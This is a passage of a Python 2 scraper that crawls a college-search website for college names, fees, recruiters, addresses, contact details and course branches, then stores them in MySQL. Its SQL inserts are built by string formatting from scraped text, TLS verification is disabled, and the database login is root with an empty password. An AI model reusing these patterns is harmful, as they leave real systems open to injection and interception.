to crawl\r\n#mapping between course key,degree key and course name\r\nmapping=[['C1','D1','B.Tech/B.E.'],['C1','D2','PolytechnicCourse'],['C2','D3','BBA/BBM/BBS'],['C3','D4','MBBS'],['C3','D5','BDS'],['C3','D6','BPT'],['C3','D7','B.H.M.S'],['C3','D8','B.A.M.S'],['C4','D9','B.Arch'],['C4','D10','Architecture-Diploma'],['C5','D11','BCom'],['C6','D12','BSc'],['C7','D13','BA'],['C7','D14','B.F.A'],['C7','D15','FineArts-Diploma'],['C8','D16','BEd'],['C9','D17','B.Pharm'],['C10','D18','LLB'],['C10','D19','BA.LLB'],['C11','D20','BCA'],['C12','D21','BHM'],['C12','D22','DiplomainHotelManagement,Catering&Tourism'],['C12','D23','HotelManagement-Diploma'],['C13','D24','Media-UG'],['C13','D25','Mass-Communication'],['C13','D26','Media-Diploma'],['C14','D27','FashionDesign-UG'],['C14','D28','Design'],['C14','D29','DiplomainFashion'],['C14','D30','Design-Diploma']]\r\n\r\n\r\nfor l in degreelinks:\r\n for m in l:\r\n linklistfull.append(m)\r\n#print linklistfull\r\n\r\ndef f(x):\r\n try:\r\n flink=requests.get(x,verify=False)\r\n return flink.text.encode(\"utf-8\")\r\n except:\r\n return None\r\n #return x*x\r\n\r\nif __name__ == '__main__':\r\n pool = Pool(processes=4) # start 4 worker processes\r\n #result = pool.apply_async(f, [10]) # evaluate \"f(10)\" asynchronously\r\n #print result.get(timeout=1) # prints \"100\" unless your computer is *very* slow\r\n p=pool.map(f,linklistfull)\r\n #print p\r\n nolinks=len(p)\r\n for i in range(0,nolinks):\r\n linkcontent=p[i]\r\n if linkcontent is not None:\r\n #print linkcontent\r\n try:\r\n linkcontent1=linkcontent.split('<div class=\"col-md-4 col-xs-8 col-sm-10 refine_search\">')\r\n linkcontent2=linkcontent1[1].split('</div>')\r\n linkcontent3=linkcontent2[0].split('<b>')\r\n linkcontent4=linkcontent3[1].split('</b>')\r\n linkcontent4[0]=linkcontent4[0].replace(\",\",\"\")\r\n n=float(linkcontent4[0])/10\r\n #print n\r\n n1=int(n)\r\n n2=n-n1\r\n if n2>0.0:\r\n total=int(n)+1\r\n else:\r\n total=int(n)\r\n print total #getting the 
total no.of pages to be crawled for each url\r\n #print linklistfull[i]\r\n\r\n links1=[] #list to crawl all the url's to crawl acc to no of pages\r\n\r\n for foo in range(0,total): #now modifying the url to crawl the desired no.of pages\r\n links1.append(linklistfull[i]+\"?page=\"+str(foo+1))\r\n\r\n #print links1\r\n openlink=[]\r\n openlink=pool.map(f,links1)#opening all the links at once\r\n n4=len(openlink)\r\n print n4\r\n \r\n for i2 in range(0,n4):\r\n #print \"Crawling page:\\n\"+m1\r\n #f1=open_url(m1)\r\n #print openlink[i2]\r\n content66 = openlink[i2]\r\n content77= content66.split('<div class=\"col-md-9 col-xs-12 col-sm-12 paddingLeft_zero search_snippet\">')\r\n content88= content77[1].split('</form>')\r\n content99= content88[0].split('<div class=\"search_result_div paddingLeft_zero paddingRight_zero\">')\r\n del content99[0]\r\n for stuff in content99:\r\n copy=stuff\r\n\r\n #finding the college logo\r\n try:\r\n copy=copy.split('<div class=\"col-md-1 col-xs-2 college_logo\">')\r\n logo=copy[1].split('</a>')\r\n logo_college=re.findall(r'src=\"(.*?)\"',logo[0])\r\n if logo_college:\r\n for m in logo_college:\r\n collegelogo.append(m.encode('utf-8'))\r\n print m\r\n else:\r\n collegelogo.append(\"No link for logo provided\")\r\n print \"No logo found\"\r\n #print logo_college\r\n except:\r\n collegelogo.append(\"No link for logo provided\")\r\n print \"No logo found\"\r\n\r\n copy=stuff\r\n \r\n #finding the collegename\r\n try:\r\n copy=copy.split('<h3 class=\"college_name\">')\r\n name_link=copy[1].split('</a>')\r\n title=get_text(name_link[0])\r\n title=encode(title)\r\n title=filter_college_name(title)\r\n #title=title.decode(\"utf-8\")\r\n title=title.replace(\"'\",\"\")\r\n title=title.replace('\"',\"\")\r\n title=removeNonAscii(title)\r\n if title:\r\n collegename.append(title)\r\n print title\r\n else:\r\n print \"No college name found\"\r\n collegename.append(\"No title provided\")\r\n except Exception,e:\r\n print str(e)\r\n 
collegename.append(\"No title provided\")\r\n print \"No college name found\"\r\n\r\n copy=stuff\r\n\r\n #find the acronym/alias for college if any\r\n try:\r\n copy=copy.split('<h3 class=\"college_name\">')\r\n name_link=copy[1].split('</a>')\r\n title1=get_text(name_link[0])\r\n #print title1\r\n title1 = encode(title1)\r\n #print title1\r\n title1 = filter_alias(title1)\r\n m=re.search('\\((.*?)\\)',title1).group(1)\r\n m=filter_alias(m)\r\n if m:\r\n print m\r\n alias.append(m)\r\n else:\r\n print \"No alias found\"\r\n alias.append(\"No alias found\")\r\n except:\r\n alias.append(\"No alias found\")\r\n print(\"No alias found[except]\")\r\n \r\n copy=stuff \r\n\r\n #setting the collegekey for matching with other tables if the exist after removing all the unnecessary characters \r\n try:\r\n copy=copy.split('<h3 class=\"college_name\">')\r\n name_link=copy[1].split('</a>')\r\n title2=get_text(name_link[0])\r\n title2=encode(title2)\r\n title2 = filter_content_for_college_key(title2)\r\n title2 = title2.replace(\",\",\"\")\r\n title2=removeNonAscii(title2)\r\n regex1 = re.compile('\\(.+?\\)')\r\n output1 = regex1.sub('',title2)\r\n #output1 = output1.decode(\"utf-8\")\r\n #print output1\r\n if output1:\r\n collegename1.append(output1)\r\n print output1\r\n else:\r\n collegename1.append(\"No filtered title found\")\r\n print(\"No filtered title found\")\r\n #print logo\r\n except:\r\n collegename1.append(\"No filtered title found\")\r\n print(\"No filtered title provided[except]\")\r\n \r\n\r\n copy=stuff\r\n \r\n #finding the college degree from homepage for matching it with the content page\r\n try:\r\n copy=copy.split('<p class=\"degree\">')\r\n degree=copy[1].split('</p>')\r\n degree1=degree[0]\r\n '''if :\r\n print output2\r\n collegedegree.append(output2)\r\n else:\r\n print \"No degree specified\"\r\n collegedegree.append(\"NULL\")'''\r\n except:\r\n degree1=\"NULL\"\r\n #collegedegree.append(\"NULL\")\r\n #print \"No degree specified\"\r\n\r\n 
copy=stuff\r\n \r\n #finding the feess for the college\r\n try:\r\n copy=copy.split('<div class=\"col-md-6 col-xs-6 fees_details\">')\r\n fees=copy[1].split('</div>')\r\n fees1=get_text(fees[0])\r\n fees1 = encode(fees1)\r\n fees1=filter_fees(fees1)\r\n if fees1:\r\n print fees1\r\n coursefees.append(fees1)\r\n else:\r\n print \"No feees\"\r\n coursefees.append(\"No fees available\")\r\n #print fees1\r\n except Exception,e:\r\n print str(e)\r\n coursefees.append(\"No fees available\")\r\n print \"No feees\"\r\n\r\n copy=stuff\r\n cid.append('CLG'+str(c1+1)) #setting the college key\r\n print 'CLG'+str(c1+1)\r\n collegesource.append('https://www.collegesearch.in/') #storing the source\r\n collegedegree.append(degreelist[c]) #list of the college degree\r\n print degreelist[c]\r\n \r\n #now traversing all the college pages for extra information like recruiters,branches etc.\r\n try:\r\n copy=copy.split('<h3 class=\"college_name\">')\r\n college_link=copy[1].split('</a>')\r\n links = find_all_links(college_link[0])\r\n for m in links:\r\n try:\r\n f2=open_url1(m)\r\n innercontent = get_page_content(f2)\r\n innercontent44=innercontent.split('<p class=\"mg-0\" style=\"white-space: pre-line; line-height: 0.8em;\">')\r\n innercontent55=innercontent44[1].split('</strong>')\r\n degkey=get_text(innercontent55[0])\r\n if(degkey==degree1): #if the degree mentioned in the home page of college matches the degree mentioned in the content page\r\n\r\n\r\n stuff1=innercontent\r\n #finding the criteria for admission\r\n try:\r\n innercontent1 = stuff1.split('<span class=\"font11\">EXAMS ACCEPTED</span>')\r\n exam=innercontent1[1].split('</div>')\r\n exam1=get_text(exam[0])\r\n exam1=encode(exam1)\r\n exam1=filter_criteria(exam1)\r\n exam1=exam1.replace(\"'\",\"\")\r\n exam1=exam1.replace('\"',\"\")\r\n if exam1:\r\n collegecriteria.append(exam1)\r\n print exam1\r\n else:\r\n collegecriteria.append(\"No criteria specified\")\r\n print \"No criteria found\"\r\n except:\r\n 
collegecriteria.append(\"No criteria specified\")\r\n print \"No criteria found\"\r\n \r\n stuff1=innercontent\r\n \r\n #finding the type of college public/private\r\n try:\r\n innercontent1 = stuff1.split('<h5 id=\"media-heading\" class=\"media-heading mg-0 bold\">')\r\n pubpvt=innercontent1[1].split('</h5>')\r\n pubpvt1=get_text(pubpvt[0])\r\n pubpvt1=encode(pubpvt1)\r\n pubpvt1=filter_college_type(pubpvt1)\r\n pubpvt1=removeNonAscii(pubpvt1)\r\n pubpvt1=pubpvt1.replace(\"'\",\"\")\r\n pubpvt1=pubpvt1.replace('\"',\"\")\r\n if pubpvt1:\r\n collegetype.append(pubpvt1)\r\n print pubpvt1\r\n else:\r\n collegetype.append(\"Not specified whether public or private\")\r\n print \"Not specified whether public or private\"\r\n except:\r\n collegetype.append(\"Not specified whether public or private\")\r\n print \"Not specified whether public or private\"\r\n \r\n stuff1=innercontent\r\n #finding the list of college recruiters\r\n try:\r\n innercontent1 = stuff1.split('<span class=\"font11\">RECRUITERS</span>')\r\n recruiter=innercontent1[1].split('<div class=\"clgWrapper animatable moveUp\">')\r\n #print recruiter[0]\r\n soup6=BeautifulSoup(recruiter[0])\r\n recruiters1=[]\r\n recruiters=[]\r\n for image in soup6.findAll(\"img\"):\r\n recruiters.append(image.get('alt').encode('utf-8'))\r\n for r in recruiters:\r\n r=filter_recruiter(r)\r\n if r:\r\n recruiters1.append(r)\r\n else:\r\n recruiters1.append([\"No recruiters specified\"])#recruiter list of each individual college\r\n if r not in recruit:\r\n rid.append('R'+str(r1+1))#For recruiter id\r\n recruit.append(r)#for distinct recruiters\r\n r1=r1+1\r\n else:\r\n continue\r\n collegerecruiters.append(recruiters1)#recruiter list for every college(list includes individual recruiter list of each college)\r\n except Exception,e:\r\n collegerecruiters.append([\"No recruiters specified\"])\r\n print str(e)+\"No recruiters specified[except]\"#entire list of recruiters if not found \r\n\r\n '''if recruiters:\r\n print 
recruiters\r\n else:\r\n print \"No recruiters specified\"\r\n except:\r\n print \"No recruiters specified\"'''\r\n stuff1=innercontent\r\n #finding the college address\r\n try:\r\n innercontent1 = stuff1.split('<div class=\"bold\" style=\"color:#777;\">Address</div>')\r\n address=innercontent1[1].split('</div>')\r\n address1=get_text(address[0])\r\n address1=encode(address1)\r\n address1=filter_address(address1)\r\n address1=removeNonAscii(address1)\r\n address1 = address1.replace(\"’\",\"\")\r\n address1 = address1.replace(\"'\",\"\")\r\n address1 =address1.replace(\"Â\",\"\")\r\n address1 =address1.replace(\",\",\"\")\r\n address1 =address1.replace(\"'\",\"\")\r\n address1 =address1.replace('\"',\"\")\r\n if address1:\r\n collegeaddress.append(address1)\r\n print address1\r\n else:\r\n collegeaddress.append(\"Address info not available\")\r\n print \"No address given\"\r\n except:\r\n collegeaddress.append(\"Address info not avaiable\")\r\n print \"No address given\"\r\n \r\n stuff1=innercontent\r\n #finding the college phone number\r\n try:\r\n innercontent1 = stuff1.split('<h4 class=\"heading-new\"><span>LOCATION & CONTACT INFO</span></h4>')\r\n contactdetails= innercontent1[1].split('<div class=\"bold\" style=\"color:#777;\">Address</div>')\r\n contactdetails1=contactdetails[0].split('<div style=\"padding:5px;\" class=\"col-xs-4 col-md-4\">')\r\n phone=get_text(contactdetails1[0])\r\n phone=encode(phone)\r\n phone=removeNonAscii(phone)\r\n if phone:\r\n collegephone.append(phone)\r\n print phone\r\n else:\r\n collegephone.append(\"Phone info not available\")\r\n print \"No contact details\"\r\n \r\n except:\r\n collegephone.append(\"Phone info not available\")\r\n print \"No contact details\"\r\n\r\n stuff1=innercontent\r\n #finding the college email address if it exists\r\n try:\r\n innercontent1 = stuff1.split('<h4 class=\"heading-new\"><span>LOCATION & CONTACT INFO</span></h4>')\r\n contactdetails= innercontent1[1].split('<div class=\"bold\" 
style=\"color:#777;\">Address</div>')\r\n contactdetails1=contactdetails[0].split('<div style=\"padding:5px;\" class=\"col-xs-4 col-md-4\">')\r\n email=get_text(contactdetails1[1])\r\n email=encode(email)\r\n email=removeNonAscii(email)\r\n if email:\r\n collegeemail.append(email)\r\n print email\r\n else:\r\n collegeemail.append(\"Email info not available\")\r\n print \"Email info not available\"\r\n \r\n except:\r\n collegeemail.append(\"Email info not available\")\r\n print \"Email info not available\"\r\n\r\n stuff1=innercontent\r\n #finding the official college website\r\n try:\r\n innercontent1 = stuff1.split('<h4 class=\"heading-new\"><span>LOCATION & CONTACT INFO</span></h4>')\r\n contactdetails= innercontent1[1].split('<div class=\"bold\" style=\"color:#777;\">Address</div>')\r\n contactdetails1=contactdetails[0].split('<div style=\"padding:5px;\" class=\"col-xs-4 col-md-4\">')\r\n website=get_text(contactdetails1[2])\r\n website=encode(website)\r\n website=removeNonAscii(website)\r\n if website:\r\n collegewebsite.append(website)\r\n print website\r\n else:\r\n collegewebsite.append(\"Website info not available\")\r\n print \"Website info not available\"\r\n \r\n \r\n except:\r\n collegewebsite.append(\"Website info not available\")\r\n \"Website info not available\"\r\n\r\n stuff1=innercontent\r\n \r\n #finding the college branches\r\n try:\r\n innercontent1 = stuff1.split('<th>STREAMS</th>')\r\n branches = innercontent1[1].split('</tbody>')\r\n branches1 = branches[0].split('<tr>')\r\n del branches1[0]\r\n branchlist1=[]\r\n for b in branches1:\r\n b=b.split('</td>')\r\n bname=get_text(b[0])\r\n bname=encode(bname)\r\n branchlist1.append(bname)\r\n #if branchlist:\r\n if bname not in branchlist:\r\n bid.append('B'+str(b1+1))#For branch id\r\n branchlist.append(bname)#for distinct branches\r\n b1=b1+1\r\n else:\r\n continue\r\n branchlistfinal.append(branchlist1) #print branchlist\r\n except Exception,e:\r\n branchlistfinal.append([\"Branch info not 
available\"])\r\n print str(e)+\"No branches specified[except]\"\r\n\r\n else: #if the degree mentioned in the home page of college doesn't match the degree mentioned in the content page\r\n innercontent11=innercontent.split('<div class=\"college-section-nav\">')\r\n innercontent22=innercontent11[1].split('</div')\r\n innercontent33=innercontent22[0].split('</a>')\r\n linkk=find_all_links(innercontent33[2])\r\n #using selenium to click on the required link\r\n for linkz in linkk:\r\n #f3=open_url1(linkz)\r\n driver = webdriver.Firefox()\r\n time.sleep(15)\r\n driver.get(linkz)\r\n mouse = webdriver.ActionChains(driver)\r\n value = degree1\r\n span_xpath = '//b[contains(text(), \"' + value + '\")]'\r\n span_element = driver.find_element_by_xpath(span_xpath)\r\n\r\n # Then you hover on span element by mouse and click on it:\r\n mouse.move_to_element(span_element).click().perform()\r\n time.sleep(15)\r\n innercontent3=driver.page_source\r\n driver.quit()\r\n\r\n\r\n #print innercontent\r\n stuff1=innercontent3\r\n #finding the criteria of admission into the college\r\n try:\r\n innercontent1 = stuff1.split('<span class=\"font11\">EXAMS ACCEPTED</span>')\r\n exam=innercontent1[1].split('</div>')\r\n exam1=get_text(exam[0])\r\n exam1=encode(exam1)\r\n exam1=filter_criteria(exam1)\r\n exam1=exam1.replace(\"'\",\"\")\r\n exam1=exam1.replace('\"',\"\")\r\n if exam1:\r\n collegecriteria.append(exam1)\r\n print exam1\r\n else:\r\n collegecriteria.append(\"No criteria specified\")\r\n print \"No criteria found\"\r\n except:\r\n collegecriteria.append(\"No criteria specified\")\r\n print \"No criteria found\"\r\n \r\n stuff1=innercontent3\r\n #finding the type of college whether public/private\r\n try:\r\n innercontent1 = stuff1.split('<h5 id=\"media-heading\" class=\"media-heading mg-0 bold\">')\r\n pubpvt=innercontent1[1].split('</h5>')\r\n pubpvt1=get_text(pubpvt[0])\r\n pubpvt1=encode(pubpvt1)\r\n pubpvt1=filter_college_type(pubpvt1)\r\n pubpvt1=removeNonAscii(pubpvt1)\r\n 
pubpvt1=pubpvt1.replace(\"'\",\"\")\r\n pubpvt1=pubpvt1.replace('\"',\"\")\r\n if pubpvt1:\r\n collegetype.append(pubpvt1)\r\n print pubpvt1\r\n else:\r\n collegetype.append(\"Not specified whether public or private\")\r\n print \"Not specified whether public or private\"\r\n except:\r\n collegetype.append(\"Not specified whether public or private\")\r\n print \"Not specified whether public or private\"\r\n \r\n stuff1=innercontent3\r\n #finding the college recruiters\r\n try:\r\n innercontent1 = stuff1.split('<span class=\"font11\">RECRUITERS</span>')\r\n recruiter=innercontent1[1].split('<div class=\"clgWrapper animatable moveUp\">')\r\n #print recruiter[0]\r\n soup6=BeautifulSoup(recruiter[0])\r\n recruiters1=[]\r\n recruiters=[]\r\n for image in soup6.findAll(\"img\"):\r\n recruiters.append(image.get('alt').encode('utf-8'))\r\n for r in recruiters:\r\n r=filter_recruiter(r)\r\n if r:\r\n recruiters1.append(r)\r\n else:\r\n recruiters1.append([\"No recruiters specified\"])#recruiter list of each individual college\r\n if r not in recruit:\r\n rid.append('R'+str(r1+1))#For recruiter id\r\n recruit.append(r)#for distinct recruiters\r\n r1=r1+1\r\n else:\r\n continue\r\n collegerecruiters.append(recruiters1)#recruiter list for every college(list includes individual recruiter list of each college)\r\n except Exception,e:\r\n collegerecruiters.append([\"No recruiters specified\"])\r\n print str(e)+\"No recruiters specified[except]\"#entire list of recruiters if not found \r\n\r\n '''if recruiters:\r\n print recruiters\r\n else:\r\n print \"No recruiters specified\"\r\n except:\r\n print \"No recruiters specified\"'''\r\n stuff1=innercontent3\r\n #finding the college address\r\n try:\r\n innercontent1 = stuff1.split('<div class=\"bold\" style=\"color:#777;\">Address</div>')\r\n address=innercontent1[1].split('</div>')\r\n address1=get_text(address[0])\r\n address1=encode(address1)\r\n address1=filter_address(address1)\r\n address1=removeNonAscii(address1)\r\n address1 
= address1.replace(\"’\",\"\")\r\n address1 = address1.replace(\"'\",\"\")\r\n address1 =address1.replace(\"Â\",\"\")\r\n address1 =address1.replace(\",\",\"\")\r\n address1 =address1.replace(\"'\",\"\")\r\n address1 =address1.replace('\"',\"\")\r\n if address1:\r\n collegeaddress.append(address1)\r\n print address1\r\n else:\r\n collegeaddress.append(\"Address info not available\")\r\n print \"No address given\"\r\n except:\r\n collegeaddress.append(\"Address info not avaiable\")\r\n print \"No address given\"\r\n \r\n stuff1=innercontent3\r\n #finding the college phone number\r\n try:\r\n innercontent1 = stuff1.split('<h4 class=\"heading-new\"><span>LOCATION & CONTACT INFO</span></h4>')\r\n contactdetails= innercontent1[1].split('<div class=\"bold\" style=\"color:#777;\">Address</div>')\r\n contactdetails1=contactdetails[0].split('<div style=\"padding:5px;\" class=\"col-xs-4 col-md-4\">')\r\n phone=get_text(contactdetails1[0])\r\n phone=encode(phone)\r\n phone=removeNonAscii(phone)\r\n if phone:\r\n collegephone.append(phone)\r\n print phone\r\n else:\r\n collegephone.append(\"Phone info not available\")\r\n print \"No contact details\"\r\n \r\n except:\r\n collegephone.append(\"Phone info not available\")\r\n print \"No contact details\"\r\n\r\n stuff1=innercontent3\r\n #finding the e-mail id of college if it doesn't exist\r\n try:\r\n innercontent1 = stuff1.split('<h4 class=\"heading-new\"><span>LOCATION & CONTACT INFO</span></h4>')\r\n contactdetails= innercontent1[1].split('<div class=\"bold\" style=\"color:#777;\">Address</div>')\r\n contactdetails1=contactdetails[0].split('<div style=\"padding:5px;\" class=\"col-xs-4 col-md-4\">')\r\n email=get_text(contactdetails1[1])\r\n email=encode(email)\r\n email=removeNonAscii(email)\r\n if email:\r\n collegeemail.append(email)\r\n print email\r\n else:\r\n collegeemail.append(\"Email info not available\")\r\n print \"Email info not available\"\r\n \r\n except:\r\n collegeemail.append(\"Email info not 
available\")\r\n print \"Email info not available\"\r\n\r\n stuff1=innercontent3\r\n #finding the official college website\r\n try:\r\n innercontent1 = stuff1.split('<h4 class=\"heading-new\"><span>LOCATION & CONTACT INFO</span></h4>')\r\n contactdetails= innercontent1[1].split('<div class=\"bold\" style=\"color:#777;\">Address</div>')\r\n contactdetails1=contactdetails[0].split('<div style=\"padding:5px;\" class=\"col-xs-4 col-md-4\">')\r\n website=get_text(contactdetails1[2])\r\n website=encode(website)\r\n website=removeNonAscii(website)\r\n if website:\r\n collegewebsite.append(website)\r\n print website\r\n else:\r\n collegewebsite.append(\"Website info not available\")\r\n print \"Website info not available\"\r\n \r\n \r\n except:\r\n collegewebsite.append(\"Website info not available\")\r\n \"Website info not available\"\r\n\r\n stuff1=innercontent3\r\n \r\n #finding the college branches\r\n try:\r\n innercontent1 = stuff1.split('<th>STREAMS</th>')\r\n branches = innercontent1[1].split('</tbody>')\r\n branches1 = branches[0].split('<tr>')\r\n del branches1[0]\r\n branchlist1=[]\r\n for b in branches1:\r\n b=b.split('</td>')\r\n bname=get_text(b[0])\r\n bname=encode(bname)\r\n branchlist1.append(bname)\r\n #if branchlist:\r\n if bname not in branchlist:\r\n bid.append('B'+str(b1+1))#For branch id\r\n branchlist.append(bname)#for distinct branches\r\n b1=b1+1\r\n else:\r\n continue\r\n branchlistfinal.append(branchlist1) #print branchlist\r\n except Exception,e:\r\n branchlistfinal.append([\"Branch info not available\"])\r\n print str(e)+\"No branches specified[except]\"\r\n \r\n except Exception,e:\r\n collegecriteria.append(\"No criteria specified\")\r\n branchlistfinal.append([\"Branch info not available\"])\r\n collegewebsite.append(\"Website info not available\")\r\n collegeemail.append(\"Email info not available\")\r\n collegephone.append(\"Phone info not available\")\r\n collegeaddress.append(\"Address info not avaiable\")\r\n 
collegerecruiters.append([\"No recruiters specified\"])\r\n collegetype.append(\"Not specified whether public or private\")\r\n print str(e)+m+\"can't be opened\"\r\n\r\n \r\n except Exception,e:\r\n collegecriteria.append(\"No criteria specified\")\r\n branchlistfinal.append([\"Branch info not available\"])\r\n collegewebsite.append(\"Website info not available\")\r\n collegeemail.append(\"Email info not available\")\r\n collegephone.append(\"Phone info not available\")\r\n collegeaddress.append(\"Address info not avaiable\")\r\n collegerecruiters.append([\"No recruiters specified\"])\r\n collegetype.append(\"Not specified whether public or private\")\r\n \r\n #print \r\n print str(e)+\"No links found\"\r\n c1=c1+1\r\n \r\n except Exception,e:\r\n #total=0\r\n c=c-1\r\n print str(e)\r\n print \"Link Broken\"\r\n c=c+1\r\n\r\n else:\r\n #total=0\r\n print \"Link couldn't be open\"\r\n\r\n #logo\r\n #link\r\n #collegename\r\n #fees\r\n#print c \r\n#print branchlistfinal\r\n#print len(branchlistfinal)\r\ndb=MySQLdb.connect('127.0.0.1','root','','cdcolleges') \r\ncursor=db.cursor()\r\n\r\nlength=len(collegelogo)\r\nlength3=len(recruit)\r\nlength4=len(branchlist)\r\n\r\nprint length\r\n#loop for storing all the relevant college content along with distinct college id into it's desired table(collegelist)\r\ntry:\r\n for i in range(0,length):\r\n #collegename[i]=collegename[i].replace(\"'\",\"\")\r\n #collegename[i]=collegename[i].replace(\"0xe2\",\"\")\r\n #collegename[i]=collegename[i].replace(\"’\",\"\")\r\n #collegename[i]=collegename[i].replace(\",\",\"\")\r\n #collegename1[i]=collegename1[i].replace(\"'\",\"\")\r\n #collegename1[i]=collegename1[i].replace(\"0xe2\",\"\")\r\n #collegename1[i]=collegename1[i].replace(\"’\",\"\")\r\n #collegename1[i]=collegename1[i].replace(\",\",\"\")\r\n sql='INSERT INTO 
`collegelist`(`CollegeId`,`CollegeName`,`CollegeKey`,`Alias`,`Website`,`Contact`,`Email`,`CollegeType`,`CollegeLogo`,`CourseFees`,`CollegeAddress`,`AdmissionCriteria`,`Source`) VALUES (\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\")'%('CLG'+str(i+1),collegename[i],collegename1[i],alias[i],collegewebsite[i],collegephone[i],collegeemail[i],collegetype[i],str(collegelogo[i]),coursefees[i],collegeaddress[i],collegecriteria[i],collegesource[i])\r\n #sql1='INSERT INTO `collegelist1`(`CollegeId`,`CollegeName`,`DegreeOffered`,`CollegeKey`,`Alias`,`Website`,`Contact`,`Email`,`CollegeType`,`CollegeLogo`,`CourseFees`,`CollegeAddress`,`AdmissionCriteria`,`Branches`,`Recruiters`,`Source`) VALUES (\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\")'%('CLG'+str(i+1),collegename[i],collegedegree[i],collegename1[i],alias[i],collegephone[i],collegeemail[i],collegewebsite[i],collegetype[i],str(collegelogo[i]),coursefees[i],collegeaddress[i],collegecriteria[i],branchlistfinal[i],collegerecruiters[i],collegesource[i])\r\n print sql\r\n #print sql1\r\n #print(\"\\n\\nCollege specialization is:\"+collegespecialization[i]+\"\\nBranches:\"+str(branchlistfinal[i])+\"\\nCollege was established in:\"+collegeestd[i]+\"\\nCollege is:\"+collegetype[i]+\"\\nCollege logo is:\"+collegelogo[i]+\"\\nCollege name is:\"+collegename[i]+\"\\nCollege address is:\"+collegeaddress[i]+\"\\nCriteria for admission is:\"+collegecriteria[i]+\"\\nProcedure for admission is:\"+collegeprocedure[i]+\"\\nThe recruiters are:\"+str(collegerecruiters[i]))\r\n try:\r\n cursor.execute(sql)\r\n #cursor.execute(sql1)\r\n # Commit your changes in the database\r\n db.commit()\r\n except:\r\n # Rollback in case there is any error\r\n db.rollback()\r\nexcept Exception,e:\r\n print str(e)\r\n print \"SQL error in collegelist insertion\"\r\n #print sql1\r\n#print recruit\r\n#print branchlist\r\ntry:\r\n for i in 
range(0,length):\r\n #collegename[i]=collegename[i].replace(\"'\",\"\")\r\n #collegename[i]=collegename[i].replace(\"0xe2\",\"\")\r\n #collegename[i]=collegename[i].replace(\"’\",\"\")\r\n #collegename[i]=collegename[i].replace(\",\",\"\")\r\n #collegename1[i]=collegename1[i].replace(\"'\",\"\")\r\n #collegename1[i]=collegename1[i].replace(\"0xe2\",\"\")\r\n #collegename1[i]=collegename1[i].replace(\"’\",\"\")\r\n #collegename1[i]=collegename1[i].replace(\",\",\"\")\r\n #sql='INSERT INTO `collegelist`(`CollegeId`,`CollegeName`,`CollegeKey`,`Alias`,`Website`,`Contact`,`Email`,`CollegeType`,`CollegeLogo`,`CourseFees`,`CollegeAddress`,`AdmissionCriteria`,`Source`) VALUES (\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\")'%('CLG'+str(i+1),collegename[i],collegename1[i],alias[i],collegephone[i],collegeemail[i],collegewebsite[i],collegetype[i],str(collegelogo[i]),coursefees[i],collegeaddress[i],collegecriteria[i],collegesource[i])\r\n sql1='INSERT INTO `collegelist1`(`CollegeId`,`CollegeName`,`DegreeOffered`,`CollegeKey`,`Alias`,`Website`,`Contact`,`Email`,`CollegeType`,`CollegeLogo`,`CourseFees`,`CollegeAddress`,`AdmissionCriteria`,`Branches`,`Recruiters`,`Source`) VALUES (\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\")'%('CLG'+str(i+1),collegename[i],collegedegree[i],collegename1[i],alias[i],collegewebsite[i],collegephone[i],collegeemail[i],collegetype[i],str(collegelogo[i]),coursefees[i],collegeaddress[i],collegecriteria[i],branchlistfinal[i],collegerecruiters[i],collegesource[i])\r\n #print sql\r\n print sql1\r\n #print(\"\\n\\nCollege specialization is:\"+collegespecialization[i]+\"\\nBranches:\"+str(branchlistfinal[i])+\"\\nCollege was established in:\"+collegeestd[i]+\"\\nCollege is:\"+collegetype[i]+\"\\nCollege logo is:\"+collegelogo[i]+\"\\nCollege name is:\"+collegename[i]+\"\\nCollege address is:\"+collegeaddress[i]+\"\\nCriteria for admission 
is:\"+collegecriteria[i]+\"\\nProcedure for admission is:\"+collegeprocedure[i]+\"\\nThe recruiters are:\"+str(collegerecruiters[i]))\r\n try:\r\n #cursor.execute(sql)\r\n cursor.execute(sql1)\r\n # Commit your changes in the database\r\n db.commit()\r\n except:\r\n # Rollback in case there is any error\r\n db.rollback()\r\nexcept Exception,e:\r\n print str(e)\r\n print \"SQL error in collegelist insertion\"\r\n\r\n#loop for entering recruiter list into it's desired table along with the recruiter id\r\ntry:\r\n for i in range(0,r1):\r\n recruit[i]=recruit[i].replace(\",\",\"\")\r\n recruit[i]=recruit[i].replace(\"'\",\"\")\r\n sql='INSERT INTO `recruiterlist`(`RecruiterId`, `RecruiterName`)VALUES(\"%s\",\"%s\")'%(rid[i],recruit[i])\r\n try:\r\n cursor.execute(sql)\r\n # Commit your changes in the database\r\n db.commit()\r\n except:\r\n # Rollback in case there is any error\r\n db.rollback()\r\nexcept Exception,e:\r\n print str(e)\r\n print \"SQL error in inserting recruiters\"\r\n\r\n#loop for entering the branch list along with distinct branch id into it's desired table(branchlist) in the db\r\ntry:\r\n for i in range(0,b1):\r\n branchlist[i]=branchlist[i].replace(\",\",\"\")\r\n branchlist[i]=branchlist[i].replace(\"'\",\"\")\r\n sql='INSERT INTO `branchlist`(`BranchId`, `BranchName`)VALUES(\"%s\",\"%s\")'%(bid[i],branchlist[i])\r\n try:\r\n cursor.execute(sql)\r\n # Commit your changes in the database\r\n db.commit()\r\n except:\r\n # Rollback in case there is any error\r\n db.rollback()\r\nexcept Exception,e:\r\n print str(e)\r\n print \"Error inserting into branchlist table\"\r\n\r\n#loop for filling out the relational table(degree_college_branch_relation) between degreeid,collegeid,branchid\r\ntry:\r\n for i in range(0,length):\r\n #print (\"\\n\\n\\Degree Id:\"+did[i]+\"\\nDegree name:\"+degree[i])\r\n for j in range(0,length2):\r\n if(collegedegree[i]==degreelist[j]):\r\n for m in branchlistfinal[i]:\r\n #print m+\"\\n\"\r\n for n in range(0,b1):\r\n 
